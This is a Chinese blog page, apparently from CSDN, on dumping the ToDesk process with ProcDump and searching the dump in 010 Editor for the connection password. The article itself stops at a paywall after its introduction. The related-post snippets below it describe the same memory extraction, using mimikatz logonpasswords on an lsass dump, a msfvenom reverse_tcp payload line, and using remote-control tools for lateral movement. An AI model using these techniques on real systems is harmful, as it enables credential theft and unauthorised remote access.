Procdump抓ToDesk密码

最新推荐文章于 2026-06-17 12:01:22 发布
原创 最新推荐文章于 2026-06-17 12:01:22 发布 · 1.3k 阅读 · 27
标签
#安全

目录

前言

1.工具教程

2.转储数据

3.密码获取

4.总结

前言

本文是因为在公众号上看到一篇文章随想着实战中利用ToDesk秀操作失败后,实验环境成功复现后写下。ProcDump[1] 是一个命令行实用工具,其主要用途是监视应用程序的 CPU 峰值,并在出现峰值期间生成故障转储,管理员或开发人员可以使用这些转储来确定出现峰值的原因。ProcDump 还支持挂起窗口监视(使用与 Windows 和任务管理器使用的窗口挂起相同的定义)、未处理的异常监视,并且可以根据系统性能计数器的值生成转储。 它还可用作可嵌入到其他脚本中的常规进程转储实用工具。简单来说这个叫ProcDump的工具是一个排查CPU故障的工具,虽然一直有在用但是首次在Microsoft官网看工具介绍,还是挺有趣的。

1.工具教程

本次实验使用了两个工具包含ProcDump和010Edit,对于ProcDump微软官网有相当详尽的介绍了,访问即可了解命令行参数,其中010Editor是一个十六进制文件编辑器,上一次用还是在刚入社会的时候参加技术面试有一些加解密拿flag的题。

ProcDump参数介绍:

使用 -accepteula 命令行选项自动接受 Sysinternals 许可协议。

转储类型 说明
-mm
最低0.47元/天 解锁文章
procdump32_64+mimikatz.rar
06-15
procdump32_64 mimikatz,测试可以用,获取系统的密码信息。
C++(Qt)软件调试---学会使用ProcDump(5)
mahuifa的博客
04-02 2684
ProcDump是一个由Microsoft Sysinternals开发的命令行小工具,用于在Linux、Windows系统上监视和生成进程转储文件。 它可以监视进程在CPU使用率、内存占用、I/O操作等方面的性能,并在进程崩溃时自动生成转储文件,以便进行后续调试和分析。
procdump一款可跨平台取的强大灵巧工具
fengdijiang的专栏
10-11 548
基于windbg attach或launch执行,在崩溃时使用命令.dump /ma D:\procdump\a.exe_251010.dmp 生成dump文件;可以使用 -i 进行注册, 将 procdump 送到注册表的 AeDebug 节点,出现了未处理异常,此时会激活操作系统的 Win32 unhandled exception filter。如果使用该exe的路径作为生成dump的路径(即不指定-o),则不要放在c盘;-c 70 -> CPU >70% 时开始取,你可以设置 大一点。
windows密码
qq_53932050的博客
10-22 492
将得到的lsass.dmp放到mimikatz启动的根目录下。procdump文件根目录运行。
Mimikatz + procdump 的使用
键盘上温暖而又美好的时光 .
11-15 7522
控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 ​​​​​​https://github.com/gentilkiwi/mimikatz/releases privilege::debug 提取权限 sekurlsa::logonpasswords 密码 mimikatz是从 lsass.exe进程中获取windows的账号及密码的, 这时,我们可以帮对方安装一个procdump64.exe(这是微软自己的工具,可以放心使用) 然后从 lsass.exe
学习实践: Procdump获取本地远控信息
半吊子伯爵的博客
09-18 907
通过Procdump和WinHex可获取ToDesk和向日葵远控的“设备代码”和“连接密码”,对肉鸡提权有价值。需先获取进程PID,再转储内存并搜索特定信息。
todesk-内存读取密码
dreamer292的博客
09-10 3289
昨天公众号突然发文todesk可以直接找到账号密码通过dump内存,于是赶紧去试了一下。在运行了todesk后直接使用procdunmp将进程dump下来然后可以查找到账号密码。找到一个长度为14位的字符串,该字符串规律:当前日期+重置密码次数(随机值累加)原文中说不同的版本可能位置不同但都可以找到,连设置了安全密码也可以找到。选择没有todesk_service的那个PID,这里就是6540。设备代码紧跟着这串长度14的字符串,图中也就是500291xxx。只能说老哥们太强了,这都能找到账号密码😂。
黑客技术实战技巧|通过内存读取todesk连接密码
白帽阿叁的博客
12-16 802
测试版本:官网最新版4.7.4.8首先查看ToDesk进程PID这里存在两个ToDesk进程,我们选择非ToDesk_Service的PID将Dump下来的文件使用编辑器打开,直接搜索当前日期,今日是2024年9月7日,所以搜索20240907。找到一个长度为14位的字符串,该字符串规律:当前日期+重置密码次数(随机值累加),设备代码紧跟着这串长度14的字符串,图中也就是973656xxx,连接密码在上方约224个字节位置。此处为k4zeus0z,
DeskDump-提取远程桌面程序密码
A1andNS's Blog
10-27 490
DeskDump用于提取向日葵和ToDesk程序的设备识别码和连接验证码。主要核心原理是通过向日葵或ToDesk程序的PID,借助procdump提取相关进程的内存数据,随后在内存数据中进行正则匹配来提取设备识别码和临时验证码。
内网横向移动新路径:利用向日葵、Todesk等远控工具渗透剖析
最新发布
weixin_30326515的博客
06-17 371
横向移动是内网渗透测试中的核心环节,指攻击者在获取初始立足点后,向内网其他主机扩散控制权的过程。其技术原理通常围绕凭证窃取、协议利用和服务漏洞展开,旨在突破网络隔离,访问核心资产。在远程办公普及的背景下,诸如向日葵、Todesk、RustDesk等旨在提升效率的远程控制软件,因其广泛的部署和潜在的安全配置缺陷,正成为攻击者实施横向移动的新载体。这些工具可能存在的弱密码、明文存储凭证、历史漏洞或服务暴露等问题,可被利用来绕过复杂的域认证,快速建立隐蔽的后续连接。本文聚焦于如何通过信息收集、凭证提取和连接建立等
01-windows调试工具(ProcDump使用)
热门推荐
qq_37103755的博客
11-21 1万+
windows ProcDump工具使用
todesk在红队中的使用
3tefanie的博客
07-06 1万+
【人心有反复,好在山水有相逢。】
向日葵密码提取+todesk密码提取工具-CMD版
Dreambooks的博客
09-18 1949
最新版本的todesk和向日葵已经无法从配置文件获取密码,而且常规的替换手法也已经失效。然后对指定pid的内存进行dump出来,使用二进制工具进行分析,就可以找到相关的密码。但是dump出来的文件大小都在几百M或者1G以上,就写了个工具实现自动化分析处理。通过学习别的师傅分享的思路,搞了个CMD下从内存获取密码的工具。
取win32程序崩溃dump文件的几种方法
HeroRazor的专栏
10-14 1322
procdump64.exe 进入procdump64.exe目录,管理员执行命令procdump64.exe -i -ma 运行自己写的一个崩溃小程序 #include <windows.h> void main() { int* p = NULL; *p = 10; return ; } 此时弹出对话框 在exe目录也生成了 dump文件 使用wbg打开dump文件 使用DbgX.Shell.exe 使用launch 或 attach...
使用Procdump+mimikatz取windows7明文密码
qq_40671478的博客
09-02 1739
首先打开mimikatz_trunk2.0 在DOS运行界面中输入privilege::debug提权命令1 我们提权成功后,我们再来输入sekurlsa::logonpasswords密码命令 但是出现错误,如下图 网上搜索了一下,我决定使用procdump结合mimikatz实现免杀效果,procdump是微软的官方工具,不会被杀. 首先在任务管理器找到lsass.exe,右键创建转储文件 ...
内网渗透_远控
carmi的博客
06-05 1692
内网渗透_远控 ToDesk ToDesk_Lite 官方最新下载地址: https://dl.todesk.com/windows/ToDesk_Lite.exe 利用powershell建立http连接下载todesk_lite.exe PS C:\Users\Administrator\Desktop> powershell.exe -c Invoke-WebRequest -U...
Windbg分析Dump文件
早起吃虫的博客
10-27 2452
1、下载ProcDump 打开windows命令行cmd,进入到包含procdunmp文件的路径下,对于32位系统打开procdump.exe,64位系统则打开procdump64.exe,执行以下命令 #-ma 取full dump #-c 30代表cpu使用率应该在30%以上 #-s 1 这种情况持续1秒以上 #3 代表最多取3个dump文件 #9000代表线程id procdump64 -ma -c 30 -s 1 -n 3 10728 输出以下内容,不要关闭命令行工具,procDump
mimikatz
m0_57056301的博客
02-11 2800
1.目的(win2008) 通过本地提权到system权限来使用mimikatz获取windows的账号及明文密码。 2.提权 本地提权 通过CVE-2020-0787上传程序实现提权 烂土豆提权 当已经拿下web权限时,上传MSF后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.45.17 port=6677 -f exe -o /root/6677.exe ...
小迪-65-内网安全
weixin_45490166的博客
04-26 2140
小迪 内网渗透 总结
服务器生成dump文件,使用ProcDump自动生成Dump文件
weixin_42420422的博客
08-05 870
最近用来自动产生Dump文件一是用来监视服务器程序无响应procdump -accepteula -64 -ma -hserver.exe二是用来监视客户端程序闪退(猜测是有未处理的异常)procdump -accepteula -ma -eclient.exe注意:客户端程序是32位,服务器程序是64位的下面的例子来自官方介绍:为名为“notepad”的进程产生迷你Dump文件(只能有一个匹...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值